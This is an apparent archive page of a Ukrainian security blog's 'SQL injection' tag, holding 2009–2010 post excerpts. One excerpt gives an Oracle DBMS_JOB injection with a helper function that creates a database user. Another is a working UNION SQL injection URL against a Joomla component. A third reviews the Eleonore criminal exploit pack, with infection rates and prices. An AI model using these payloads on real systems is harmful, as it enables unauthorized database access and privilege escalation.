Archive

Posts Tagged ‘SQL injection’

TARGET: ORACLE. 0day експлойт

April 12th, 2010 dsu 2 comments

Не люблю багато писати, тому все швиденько та по порядку: шукав функцію вразливу до sql-injection під свої потреби, наткнувся на таку в пакеті dbms_job який належить sys користувачеві, функція find_date.

...
30 CUR := DBMS_SQL.OPEN_CURSOR;
31 BEGIN
32
33 DBMS_SYS_SQL.PARSE_AS_USER( CUR, 'select sysdate, ' || INTERVAL ||
34 ' from dual', DBMS_SQL.NATIVE );
...

INTERVAL – вразливий параметр. Але тут проблема: функція не оголошена в пакеті, тобто її можна використовувати тільки всередині пакету, під мої потреби це не підходить, хоча, можливо  комусь і буде потрібно. Але щоб довести справу до переможного кінця,  знайшов процедуру в пакеті яка цю функцію використовує, вона там не одна, але так як мені ця функція не підійшла, я взяв першу ліпшу.

...
134 MYDATE: = FIND_DATE (INTERVAL);
135 IF NOT NO_PARSE THEN
136 PARSE_JOB (WHAT);
137 END IF;
138
...

Створюємо функцію, хоча можна використати і курсор, але я віддаю перевагу старій школі.

CREATE OR REPLACE FUNCTION fff return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'create user fff identified by fff';
COMMIT;
RETURN 'sys';
END;
/

Ну і власне сам експлойт (під катом):
Read more...

Categories: Вразливості \ vulnerabilities, Експлоіти/Exploits Tags: , , , , , , , , , ,

Тест зв’язки експлойтів Eleonore exploits pack

March 30th, 2010 Dimi4 5 comments

Хочу надати вам інформацію про тестування зв’язки експлойтів  Eleonore exploits pack version 1.2. Написана вона автором Exmanoize. В склад зв’язки входять такі експлойти

  • MDAC
  • MS009-02
  • Telnet – Opera
  • Font tags – FireFox
  • PDF collab.getIcon
  • PDF Util.Printf
  • PDF collab.collectEmailInfo
  • DirectX DirectShow
  • Spreadsheet

Середній пробив характерний для звязки:

  • usa: 5-15%
  • mix: 10-25%

Ціни:

  • Власне зв’язка = 700$
  • Чищення від АВ = 50$
  • Ребілд на інший домен = 50$

Як не дивно, та в системі присутні вразливості, далі про них.

Read more…

Categories: Безпека, Вразливості \ vulnerabilities, Експлоіти/Exploits Tags: , , , , , , , , , , , , , ,

Виводим сайт в топ на UA TOP Bloggers або взлом top.blog.net.ua

March 26th, 2010 Dimi4 2 comments

Нещодавно мною були виявленні численні вразливості на сайті top.blog.net.ua. В той же день про це була повідомлена адміністрація проекту, але, нажаль відповіді я так і не отримав. Сподіваюсь цей пост спонукає їх виправити вразливості. А тепер блище до справи.

Що треба щоб бути в топі?

UA TOP Bloggers визначає позиції сайту за такими показниками:

  • Кількість хостів (унікальні користувачі)
  • Кількіст хітів (кількість переглядів)

Розглянемо як система реєструє ці дані. Від нас вимагають встановити код кнопки на сайті. Логічно що через нього і проводиться підрахунок. Поглянемо на код:

Все зрозуміло –  картинка генерується скриптом, якому передаються 2 параметри: in,id. Id це і є номер нашого сайту.

Read more…

Categories: Безпека, Вразливості \ vulnerabilities Tags: , , , , , , , ,

Вразливості компонентів Joomla/Mambo (01)

October 12th, 2009 Dimi4 No comments

Компонент: Projects

Тип вразливості: SQL-injection

Знайдено: 27.09.2009

Знайшов: Dimi4
index?option=com_projects&Itemid=62&idProyecto=27+UNION+SELECT+1,2,CONCAT_WS(0x3a,Version(),Database(),User()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
Read more…

Categories: Безпека Tags: , , , , , , ,